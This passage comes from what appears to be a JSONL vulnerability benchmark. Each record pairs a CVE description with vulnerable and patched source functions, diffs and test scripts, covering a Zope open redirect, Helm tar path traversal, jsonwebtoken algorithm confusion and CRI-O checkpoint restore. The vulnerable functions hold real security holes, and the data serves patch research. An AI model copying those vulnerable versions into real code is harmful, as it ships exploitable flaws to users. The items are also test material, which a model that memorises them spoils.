query.startswith('?'):\n query = '?' + query\n came_from = came_from + query\n else:\n # If came_from contains a value it means the user\n # must be coming through here a second time\n # Reasons could be typos when providing credentials\n # or a redirect loop (see below)\n req_url = req.get('ACTUAL_URL', '')\n\n if req_url and req_url == url:\n # Oops... The login_form cannot be reached by the user -\n # it might be protected itself due to misconfiguration -\n # the only sane thing to do is to give up because we are\n # in an endless redirect loop.\n return 0\n\n if '?' in url:\n sep = '&'\n else:\n sep = '?'\n url = '%s%scame_from=%s' % (url, sep, quote(came_from))\n resp.redirect(url, lock=1)\n resp.setHeader('Expires', 'Sat, 01 Jan 2000 00:00:00 GMT')\n resp.setHeader('Cache-Control', 'no-cache')\n return 1\n\n # Could not challenge.\n return 0"}], "fix_func": [{"id": "fix_py_368_1", "commit": "7eead067898852ebd3e0f143bc51295928528dfa", "file_path": "src/Products/PluggableAuthService/plugins/CookieAuthHelper.py", "start_line": 196, "end_line": 247, "snippet": " def unauthorized(self):\n req = self.REQUEST\n resp = req['RESPONSE']\n\n # If we set the auth cookie before, delete it now.\n if self.cookie_name in resp.cookies:\n del resp.cookies[self.cookie_name]\n\n # Redirect if desired.\n url = self.getLoginURL()\n if url is not None:\n came_from = req.get('came_from', None)\n\n if came_from is None:\n came_from = req.get('ACTUAL_URL', '')\n query = req.get('QUERY_STRING')\n if query:\n if not query.startswith('?'):\n query = '?' + query\n came_from = came_from + query\n else:\n # If came_from contains a value it means the user\n # must be coming through here a second time\n # Reasons could be typos when providing credentials\n # or a redirect loop (see below)\n req_url = req.get('ACTUAL_URL', '')\n\n if req_url and req_url == url:\n # Oops... 
The login_form cannot be reached by the user -\n # it might be protected itself due to misconfiguration -\n # the only sane thing to do is to give up because we are\n # in an endless redirect loop.\n return 0\n\n # Sanitize the return URL ``came_from`` and only allow local URLs\n # to prevent an open exploitable redirect issue\n if came_from:\n parsed = urlparse(came_from)\n came_from = urlunparse(('', '') + parsed[2:])\n\n if '?' in url:\n sep = '&'\n else:\n sep = '?'\n url = '%s%scame_from=%s' % (url, sep, quote(came_from))\n resp.redirect(url, lock=1)\n resp.setHeader('Expires', 'Sat, 01 Jan 2000 00:00:00 GMT')\n resp.setHeader('Cache-Control', 'no-cache')\n return 1\n\n # Could not challenge.\n return 0"}], "vul_patch": "--- a/src/Products/PluggableAuthService/plugins/CookieAuthHelper.py\n+++ b/src/Products/PluggableAuthService/plugins/CookieAuthHelper.py\n@@ -32,6 +32,12 @@\n # in an endless redirect loop.\n return 0\n \n+ # Sanitize the return URL ``came_from`` and only allow local URLs\n+ # to prevent an open exploitable redirect issue\n+ if came_from:\n+ parsed = urlparse(came_from)\n+ came_from = urlunparse(('', '') + parsed[2:])\n+\n if '?' in url:\n sep = '&'\n else:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-4053", "cve_description": "In Helm greater than or equal to 3.0.0 and less than 3.2.4, a path traversal attack is possible when installing Helm plugins from a tar archive over HTTP. It is possible for a malicious plugin author to inject a relative path into a plugin archive, and copy a file outside of the intended directory. This has been fixed in 3.2.4.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/helm/helm", "patch_url": ["https://github.com/helm/helm/commit/0ad800ef43d3b826f31a5ad8dfbb4fe05d143688", "https://github.com/helm/helm/commit/b6bbe4f08bbb98eadd6c9cd726b08a5c639908b3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_36_1", "commit": "8f83204", "file_path": "pkg/plugin/installer/http_installer.go", "start_line": 154, "end_line": 198, "snippet": "func (g *TarGzExtractor) Extract(buffer *bytes.Buffer, targetDir string) error {\n\tuncompressedStream, err := gzip.NewReader(buffer)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := os.MkdirAll(targetDir, 0755); err != nil {\n\t\treturn err\n\t}\n\n\ttarReader := tar.NewReader(uncompressedStream)\n\tfor {\n\t\theader, err := tarReader.Next()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tpath := filepath.Join(targetDir, header.Name)\n\n\t\tswitch header.Typeflag {\n\t\tcase tar.TypeDir:\n\t\t\tif err := os.Mkdir(path, 0755); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase tar.TypeReg:\n\t\t\toutFile, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif _, err := io.Copy(outFile, tarReader); err != nil 
{\n\t\t\t\toutFile.Close()\n\t\t\t\treturn err\n\t\t\t}\n\t\t\toutFile.Close()\n\t\t// We don't want to process these extension header files.\n\t\tcase tar.TypeXGlobalHeader, tar.TypeXHeader:\n\t\t\tcontinue\n\t\tdefault:\n\t\t\treturn errors.Errorf(\"unknown type: %b in %s\", header.Typeflag, header.Name)\n\t\t}\n\t}\n\treturn nil"}], "fix_func": [{"id": "fix_go_36_1", "commit": "0ad800e", "file_path": "pkg/plugin/installer/http_installer.go", "start_line": 171, "end_line": 255, "snippet": "func cleanJoin(root, dest string) (string, error) {\n\n\t// On Windows, this is a drive separator. On UNIX-like, this is the path list separator.\n\t// In neither case do we want to trust a TAR that contains these.\n\tif strings.Contains(dest, \":\") {\n\t\treturn \"\", errors.New(\"path contains ':', which is illegal\")\n\t}\n\n\t// The Go tar library does not convert separators for us.\n\t// We assume here, as we do elsewhere, that `\\\\` means a Windows path.\n\tdest = strings.ReplaceAll(dest, \"\\\\\", \"/\")\n\n\t// We want to alert the user that something bad was attempted. Cleaning it\n\t// is not a good practice.\n\tfor _, part := range strings.Split(dest, \"/\") {\n\t\tif part == \"..\" {\n\t\t\treturn \"\", errors.New(\"path contains '..', which is illegal\")\n\t\t}\n\t}\n\n\t// If a path is absolute, the creator of the TAR is doing something shady.\n\tif path.IsAbs(dest) {\n\t\treturn \"\", errors.New(\"path is absolute, which is illegal\")\n\t}\n\n\t// SecureJoin will do some cleaning, as well as some rudimentary checking of symlinks.\n\tnewpath, err := securejoin.SecureJoin(root, dest)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn filepath.ToSlash(newpath), nil\n}\n\n// Extract extracts compressed archives\n//\n// Implements Extractor.\nfunc (g *TarGzExtractor) Extract(buffer *bytes.Buffer, targetDir string) error {\n\tuncompressedStream, err := gzip.NewReader(buffer)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := os.MkdirAll(targetDir, 0755); err != nil {\n\t\treturn err\n\t}\n\n\ttarReader := tar.NewReader(uncompressedStream)\n\tfor {\n\t\theader, err := tarReader.Next()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tpath, err := cleanJoin(targetDir, header.Name)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tswitch header.Typeflag {\n\t\tcase tar.TypeDir:\n\t\t\tif err := os.Mkdir(path, 0755); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase tar.TypeReg:\n\t\t\toutFile, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif _, err := io.Copy(outFile, tarReader); err != nil {\n\t\t\t\toutFile.Close()\n\t\t\t\treturn err\n\t\t\t}\n\t\t\toutFile.Close()\n\t\t// We don't want to process these extension header files.\n\t\tcase tar.TypeXGlobalHeader, tar.TypeXHeader:\n\t\t\tcontinue\n\t\tdefault:\n\t\t\treturn errors.Errorf(\"unknown type: %b in %s\", header.Typeflag, header.Name)\n\t\t}\n\t}\n\treturn nil"}], "vul_patch": "--- a/pkg/plugin/installer/http_installer.go\n+++ b/pkg/plugin/installer/http_installer.go\n@@ -1,3 +1,40 @@\n+func cleanJoin(root, dest string) (string, error) {\n+\n+\t// On Windows, this is a drive separator. 
On UNIX-like, this is the path list separator.\n+\t// In neither case do we want to trust a TAR that contains these.\n+\tif strings.Contains(dest, \":\") {\n+\t\treturn \"\", errors.New(\"path contains ':', which is illegal\")\n+\t}\n+\n+\t// The Go tar library does not convert separators for us.\n+\t// We assume here, as we do elsewhere, that `\\\\` means a Windows path.\n+\tdest = strings.ReplaceAll(dest, \"\\\\\", \"/\")\n+\n+\t// We want to alert the user that something bad was attempted. Cleaning it\n+\t// is not a good practice.\n+\tfor _, part := range strings.Split(dest, \"/\") {\n+\t\tif part == \"..\" {\n+\t\t\treturn \"\", errors.New(\"path contains '..', which is illegal\")\n+\t\t}\n+\t}\n+\n+\t// If a path is absolute, the creator of the TAR is doing something shady.\n+\tif path.IsAbs(dest) {\n+\t\treturn \"\", errors.New(\"path is absolute, which is illegal\")\n+\t}\n+\n+\t// SecureJoin will do some cleaning, as well as some rudimentary checking of symlinks.\n+\tnewpath, err := securejoin.SecureJoin(root, dest)\n+\tif err != nil {\n+\t\treturn \"\", err\n+\t}\n+\n+\treturn filepath.ToSlash(newpath), nil\n+}\n+\n+// Extract extracts compressed archives\n+//\n+// Implements Extractor.\n func (g *TarGzExtractor) Extract(buffer *bytes.Buffer, targetDir string) error {\n \tuncompressedStream, err := gzip.NewReader(buffer)\n \tif err != nil {\n@@ -18,7 +55,10 @@\n \t\t\treturn err\n \t\t}\n \n-\t\tpath := filepath.Join(targetDir, header.Name)\n+\t\tpath, err := cleanJoin(targetDir, header.Name)\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n \n \t\tswitch header.Typeflag {\n \t\tcase tar.TypeDir:\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-4053:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/helm\nrm -rf ./pkg/plugin/installer/http_installer_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestExtract$ helm.sh/helm/v3/pkg/plugin/installer\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-4053:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/helm\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestHTTPInstallerUpdate|TestHTTPInstaller|TestStripName|TestHTTPInstallerNonExistentVersion|TestExtract)$' helm.sh/helm/v3/pkg/plugin/installer"} {"cve_id": "CVE-2015-9235", "cve_description": "In the jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token is expected to be digitally signed with an asymmetric key (RS/ES family of algorithms) but the attacker instead sends a token digitally signed with a symmetric algorithm (HS* family).", "cwe_info": {"CWE-327": {"name": "Use of a Broken or Risky Cryptographic Algorithm", "description": "The product uses a broken or risky cryptographic algorithm or protocol."}}, "repo": "https://github.com/auth0/node-jsonwebtoken", "patch_url": ["https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_94_1", "commit": "f9f3c34", "file_path": "index.js", "start_line": "72", "end_line": "152", "snippet": "module.exports.verify = function(jwtString, secretOrPublicKey, options, callback) {\n if ((typeof options === 'function') && !callback) {\n callback = options;\n options = {};\n }\n\n if (!options) options = {};\n\n var done;\n\n if (callback) {\n done = function() {\n var args = Array.prototype.slice.call(arguments, 0);\n return 
process.nextTick(function() {\n callback.apply(null, args);\n });\n };\n } else {\n done = function(err, data) {\n if (err) throw err;\n return data;\n };\n }\n\n if (!jwtString){\n return done(new JsonWebTokenError('jwt must be provided'));\n }\n\n var parts = jwtString.split('.');\n\n if (parts.length !== 3){\n return done(new JsonWebTokenError('jwt malformed'));\n }\n\n if (parts[2].trim() === '' && secretOrPublicKey){\n return done(new JsonWebTokenError('jwt signature is required'));\n }\n\n var valid;\n\n try {\n valid = jws.verify(jwtString, secretOrPublicKey);\n } catch (e) {\n return done(e);\n }\n\n if (!valid)\n return done(new JsonWebTokenError('invalid signature'));\n\n var payload;\n\n try {\n payload = this.decode(jwtString);\n } catch(err) {\n return done(err);\n }\n\n if (typeof payload.exp !== 'undefined' && !options.ignoreExpiration) {\n if (typeof payload.exp !== 'number') {\n return done(new JsonWebTokenError('invalid exp value'));\n }\n if (Math.floor(Date.now() / 1000) >= payload.exp)\n return done(new TokenExpiredError('jwt expired', new Date(payload.exp * 1000)));\n }\n\n if (options.audience) {\n var audiences = Array.isArray(options.audience)? options.audience : [options.audience];\n var target = Array.isArray(payload.aud) ? payload.aud : [payload.aud];\n\n var match = target.some(function(aud) { return audiences.indexOf(aud) != -1; });\n\n if (!match)\n return done(new JsonWebTokenError('jwt audience invalid. expected: ' + audiences.join(' or ')));\n }\n\n if (options.issuer) {\n if (payload.iss !== options.issuer)\n return done(new JsonWebTokenError('jwt issuer invalid. expected: ' + options.issuer));\n }\n\n return done(null, payload);"}], "fix_func": [{"id": "fix_js_94_1", "commit": "1bb584b", "file_path": "index.js", "start_line": "72", "end_line": "163", "snippet": "module.exports.verify = function(jwtString, secretOrPublicKey, options, callback) {\n if ((typeof options === 'function') && !callback) {\n callback = options;\n options = {};\n }\n\n if (!options) options = {};\n\n var done;\n\n if (callback) {\n done = function() {\n var args = Array.prototype.slice.call(arguments, 0);\n return process.nextTick(function() {\n callback.apply(null, args);\n });\n };\n } else {\n done = function(err, data) {\n if (err) throw err;\n return data;\n };\n }\n\n if (!jwtString){\n return done(new JsonWebTokenError('jwt must be provided'));\n }\n\n var parts = jwtString.split('.');\n\n if (parts.length !== 3){\n return done(new JsonWebTokenError('jwt malformed'));\n }\n\n if (parts[2].trim() === '' && secretOrPublicKey){\n return done(new JsonWebTokenError('jwt signature is required'));\n }\n\n if (!options.algorithms) {\n options.algorithms = ~secretOrPublicKey.toString().indexOf('BEGIN CERTIFICATE') ?\n [ 'RS256','RS384','RS512','ES256','ES384','ES512' ] :\n [ 'HS256','HS384','HS512' ];\n }\n\n var valid;\n\n try {\n valid = jws.verify(jwtString, secretOrPublicKey);\n } catch (e) {\n return done(e);\n }\n\n if (!valid)\n return done(new JsonWebTokenError('invalid signature'));\n\n var payload;\n\n try {\n payload = this.decode(jwtString);\n } catch(err) {\n return done(err);\n }\n\n var header = jws.decode(jwtString).header;\n if (!~options.algorithms.indexOf(header.alg)) {\n return done(new JsonWebTokenError('invalid signature'));\n }\n\n if (typeof payload.exp !== 'undefined' && !options.ignoreExpiration) {\n if (typeof payload.exp !== 'number') {\n return done(new JsonWebTokenError('invalid exp value'));\n }\n if (Math.floor(Date.now() / 1000) >= payload.exp)\n 
return done(new TokenExpiredError('jwt expired', new Date(payload.exp * 1000)));\n }\n\n if (options.audience) {\n var audiences = Array.isArray(options.audience)? options.audience : [options.audience];\n var target = Array.isArray(payload.aud) ? payload.aud : [payload.aud];\n\n var match = target.some(function(aud) { return audiences.indexOf(aud) != -1; });\n\n if (!match)\n return done(new JsonWebTokenError('jwt audience invalid. expected: ' + audiences.join(' or ')));\n }\n\n if (options.issuer) {\n if (payload.iss !== options.issuer)\n return done(new JsonWebTokenError('jwt issuer invalid. expected: ' + options.issuer));\n }\n\n return done(null, payload);"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -36,6 +36,12 @@\n return done(new JsonWebTokenError('jwt signature is required'));\n }\n \n+ if (!options.algorithms) {\n+ options.algorithms = ~secretOrPublicKey.toString().indexOf('BEGIN CERTIFICATE') ?\n+ [ 'RS256','RS384','RS512','ES256','ES384','ES512' ] :\n+ [ 'HS256','HS384','HS512' ];\n+ }\n+\n var valid;\n \n try {\n@@ -53,6 +59,11 @@\n payload = this.decode(jwtString);\n } catch(err) {\n return done(err);\n+ }\n+\n+ var header = jws.decode(jwtString).header;\n+ if (!~options.algorithms.indexOf(header.alg)) {\n+ return done(new JsonWebTokenError('invalid signature'));\n }\n \n if (typeof payload.exp !== 'undefined' && !options.ignoreExpiration) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-8676", "cve_description": "A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec (which verify that the pod has access to the mounts it specifies) are not applied to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod with host mounts it does not have access to. 
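Returning briefly to the jsonwebtoken record above: the fix works by pinning the set of acceptable algorithms before the signature check, so a token signed with an HS* algorithm can no longer be verified against a public key misused as an HMAC secret. A hedged Go sketch of the same allow-list idea, decoding only the JOSE header (names here are illustrative, not from any record):

```go
// Minimal sketch of algorithm pinning: reject any token whose header
// "alg" is not in the caller-supplied allow-list, before verification.
package main

import (
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

func checkAlg(token string, allowed []string) error {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return errors.New("jwt malformed")
	}
	raw, err := base64.RawURLEncoding.DecodeString(parts[0])
	if err != nil {
		return err
	}
	var hdr struct {
		Alg string `json:"alg"`
	}
	if err := json.Unmarshal(raw, &hdr); err != nil {
		return err
	}
	for _, a := range allowed {
		if hdr.Alg == a {
			return nil // verification with the pinned key may proceed
		}
	}
	return fmt.Errorf("alg %q not in allow-list", hdr.Alg)
}

func main() {
	// Header {"alg":"HS256","typ":"JWT"} sent against an RS256-only verifier.
	tok := base64.RawURLEncoding.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`)) + ".e30.sig"
	fmt.Println(checkAlg(tok, []string{"RS256"})) // alg "HS256" not in allow-list
}
```

This is the same pinning that the vul_patch above adds through options.algorithms.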
The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/cri-o/cri-o", "patch_url": ["https://github.com/cri-o/cri-o/commit/e8e7dcb7838d11b5157976bf3e31a5840bb77de7"], "programing_language": "Go", "vul_func": [{"id": "vul_go_161_1", "commit": "be3a1aa", "file_path": "server/container_restore.go", "start_line": 54, "end_line": 426, "snippet": "func (s *Server) CRImportCheckpoint(\n\tctx context.Context,\n\tcreateConfig *types.ContainerConfig,\n\tsb *sandbox.Sandbox, sandboxUID string,\n) (ctrID string, retErr error) {\n\tvar mountPoint string\n\n\t// Ensure that the image to restore the checkpoint from has been provided.\n\tif createConfig.Image == nil || createConfig.Image.Image == \"\" {\n\t\treturn \"\", errors.New(`attribute \"image\" missing from container definition`)\n\t}\n\n\tinputImage := createConfig.Image.Image\n\tcreateMounts := createConfig.Mounts\n\tcreateAnnotations := createConfig.Annotations\n\tcreateLabels := createConfig.Labels\n\n\trestoreStorageImageID, err := s.checkIfCheckpointOCIImage(ctx, inputImage)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar restoreArchivePath string\n\tif restoreStorageImageID != nil {\n\t\tsystemCtx, err := s.contextForNamespace(sb.Metadata().Namespace)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"get context for namespace: %w\", err)\n\t\t}\n\t\t// WARNING: This hard-codes an assumption that SignaturePolicyPath set specifically for the namespace is never less restrictive\n\t\t// than the default system-wide policy, i.e. 
that if an image is successfully pulled, it always conforms to the system-wide policy.\n\t\tif systemCtx.SignaturePolicyPath != \"\" {\n\t\t\treturn \"\", fmt.Errorf(\"namespaced signature policy %s defined for pods in namespace %s; signature validation is not supported for container restore\", systemCtx.SignaturePolicyPath, sb.Metadata().Namespace)\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Restoring from oci image %s\", inputImage)\n\n\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\tmountPoint, err = s.ContainerServer.StorageImageServer().GetStore().MountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), nil, \"\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Checkpoint image %s mounted at %v\\n\", restoreStorageImageID, mountPoint)\n\n\t\tdefer func() {\n\t\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\t\tif _, err := s.ContainerServer.StorageImageServer().GetStore().UnmountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), true); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not unmount checkpoint image %s: %q\", restoreStorageImageID, err)\n\t\t\t}\n\t\t}()\n\t} else {\n\t\t// First get the container definition from the\n\t\t// tarball to a temporary directory\n\t\tarchiveFile, err := os.Open(inputImage)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to open checkpoint archive %s for import: %w\", inputImage, err)\n\t\t}\n\t\tdefer func(f *os.File) {\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Unable to close file %s: %q\", f.Name(), err)\n\t\t\t}\n\t\t}(archiveFile)\n\n\t\trestoreArchivePath = inputImage\n\t\toptions := &archive.TarOptions{\n\t\t\t// Here we only need the files config.dump and spec.dump\n\t\t\tExcludePatterns: []string{\n\t\t\t\t\"artifacts\",\n\t\t\t\t\"ctr.log\",\n\t\t\t\tmetadata.RootFsDiffTar,\n\t\t\t\tmetadata.NetworkStatusFile,\n\t\t\t\tmetadata.DeletedFilesFile,\n\t\t\t\tmetadata.CheckpointDirectory,\n\t\t\t},\n\t\t}\n\t\tmountPoint, err = os.MkdirTemp(\"\", \"checkpoint\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := os.RemoveAll(mountPoint); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not recursively remove %s: %q\", mountPoint, err)\n\t\t\t}\n\t\t}()\n\t\terr = archive.Untar(archiveFile, mountPoint, options)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"unpacking of checkpoint archive %s failed: %w\", mountPoint, err)\n\t\t}\n\t\tlog.Debugf(ctx, \"Unpacked checkpoint in %s\", mountPoint)\n\t}\n\n\t// Load spec.dump from temporary directory\n\tdumpSpec := new(spec.Spec)\n\tif _, err := metadata.ReadJSONFile(dumpSpec, mountPoint, metadata.SpecDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.SpecDumpFile, err)\n\t}\n\n\t// Load config.dump from temporary directory\n\tconfig := new(metadata.ContainerConfig)\n\tif _, err := metadata.ReadJSONFile(config, mountPoint, metadata.ConfigDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.ConfigDumpFile, err)\n\t}\n\n\tctrMetadata := types.ContainerMetadata{}\n\toriginalAnnotations := make(map[string]string)\n\toriginalLabels := make(map[string]string)\n\n\tif dumpSpec.Annotations[annotations.ContainerManager] == \"libpod\" {\n\t\t// This is an import from Podman\n\t\tctrMetadata.Name = config.Name\n\t\tctrMetadata.Attempt = 0\n\t} else {\n\t\tif err 
:= json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Metadata]), &ctrMetadata); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Metadata, err)\n\t\t}\n\t\tif createConfig.Metadata != nil && createConfig.Metadata.Name != \"\" {\n\t\t\tctrMetadata.Name = createConfig.Metadata.Name\n\t\t}\n\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n\t\t}\n\n\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Labels]), &originalLabels); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Labels, err)\n\t\t}\n\t\tif sandboxUID != \"\" {\n\t\t\tif _, ok := originalLabels[kubetypes.KubernetesPodUIDLabel]; ok {\n\t\t\t\toriginalLabels[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n\t\t\t}\n\t\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n\t\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n\t\t\t}\n\t\t}\n\n\t\tif createLabels != nil {\n\t\t\tfixupLabels := []string{\n\t\t\t\t// Update the container name. It has already been update in metadata.Name.\n\t\t\t\t// It also needs to be updated in the container labels.\n\t\t\t\tkubetypes.KubernetesContainerNameLabel,\n\t\t\t\t// Update pod name in the labels.\n\t\t\t\tkubetypes.KubernetesPodNameLabel,\n\t\t\t\t// Also update namespace.\n\t\t\t\tkubetypes.KubernetesPodNamespaceLabel,\n\t\t\t}\n\n\t\t\tfor _, annotation := range fixupLabels {\n\t\t\t\t_, ok1 := createLabels[annotation]\n\t\t\t\t_, ok2 := originalLabels[annotation]\n\n\t\t\t\t// If the value is not set in the original container or\n\t\t\t\t// if it is not set in the new container, just skip\n\t\t\t\t// the step of updating metadata.\n\t\t\t\tif ok1 && ok2 {\n\t\t\t\t\toriginalLabels[annotation] = createLabels[annotation]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif createAnnotations != nil {\n\t\t\t// The hash also needs to be update or Kubernetes thinks the container needs to be restarted\n\t\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n\n\t\t\tif ok1 && ok2 {\n\t\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t\t}\n\t\t}\n\t}\n\n\tstopMutex := sb.StopMutex()\n\tstopMutex.RLock()\n\tdefer stopMutex.RUnlock()\n\tif sb.Stopped() {\n\t\treturn \"\", fmt.Errorf(\"CreateContainer failed as the sandbox was stopped: %s\", sb.ID())\n\t}\n\n\tctr, err := container.New()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to create container: %w\", err)\n\t}\n\n\t// Newer checkpoints archives have RootfsImageRef set\n\t// and using it for the restore is more correct.\n\t// For the Kubernetes use case the output of 'crictl ps'\n\t// contains for the original container under 'IMAGE' something\n\t// like 'registry/path/container@sha256:123444444...'.\n\t// The restored container was, however, only displaying something\n\t// like 'registry/path/container'.\n\t// This had two problems, first, the output from the restored\n\t// container was different, but the bigger problem was, that\n\t// CRI-O might pull the wrong image from the registry.\n\t// If the container in the registry was updated (new latest tag)\n\t// all of a sudden the wrong base image would be downloaded.\n\trootFSImage := config.RootfsImageName\n\tif config.RootfsImageRef != \"\" {\n\t\tid, err := 
storage.ParseStorageImageIDFromOutOfProcessData(config.RootfsImageRef)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"invalid RootfsImageRef %q: %w\", config.RootfsImageRef, err)\n\t\t}\n\t\t// This is not quite out-of-process consumption, but types.ContainerConfig is at least\n\t\t// a cross-process API, and this value is correct in that API.\n\t\trootFSImage = id.IDStringForOutOfProcessConsumptionOnly()\n\t}\n\tcontainerConfig := &types.ContainerConfig{\n\t\tMetadata: &types.ContainerMetadata{\n\t\t\tName: ctrMetadata.Name,\n\t\t\tAttempt: ctrMetadata.Attempt,\n\t\t},\n\t\tImage: &types.ImageSpec{\n\t\t\tImage: rootFSImage,\n\t\t},\n\t\tLinux: &types.LinuxContainerConfig{\n\t\t\tResources: &types.LinuxContainerResources{},\n\t\t\tSecurityContext: &types.LinuxContainerSecurityContext{},\n\t\t},\n\t\tAnnotations: originalAnnotations,\n\t\tLabels: originalLabels,\n\t}\n\n\tif createConfig.Linux != nil {\n\t\tif createConfig.Linux.Resources != nil {\n\t\t\tcontainerConfig.Linux.Resources = createConfig.Linux.Resources\n\t\t}\n\n\t\tif createConfig.Linux.SecurityContext != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext = createConfig.Linux.SecurityContext\n\t\t}\n\t}\n\n\tif dumpSpec.Linux != nil {\n\t\tif dumpSpec.Linux.MaskedPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.MaskedPaths = dumpSpec.Linux.MaskedPaths\n\t\t}\n\n\t\tif dumpSpec.Linux.ReadonlyPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.ReadonlyPaths = dumpSpec.Linux.ReadonlyPaths\n\t\t}\n\t}\n\n\tignoreMounts := map[string]bool{\n\t\t\"/proc\": true,\n\t\t\"/dev\": true,\n\t\t\"/dev/pts\": true,\n\t\t\"/dev/mqueue\": true,\n\t\t\"/sys\": true,\n\t\t\"/sys/fs/cgroup\": true,\n\t\t\"/dev/shm\": true,\n\t\t\"/etc/resolv.conf\": true,\n\t\t\"/etc/hostname\": true,\n\t\t\"/run/secrets\": true,\n\t\t\"/run/.containerenv\": true,\n\t}\n\n\tfor _, m := range dumpSpec.Mounts {\n\t\t// Following mounts are ignored as they might point to the\n\t\t// wrong location and if ignored the mounts will correctly\n\t\t// be setup to point to the new location.\n\t\tif ignoreMounts[m.Destination] {\n\t\t\tcontinue\n\t\t}\n\t\tmount := 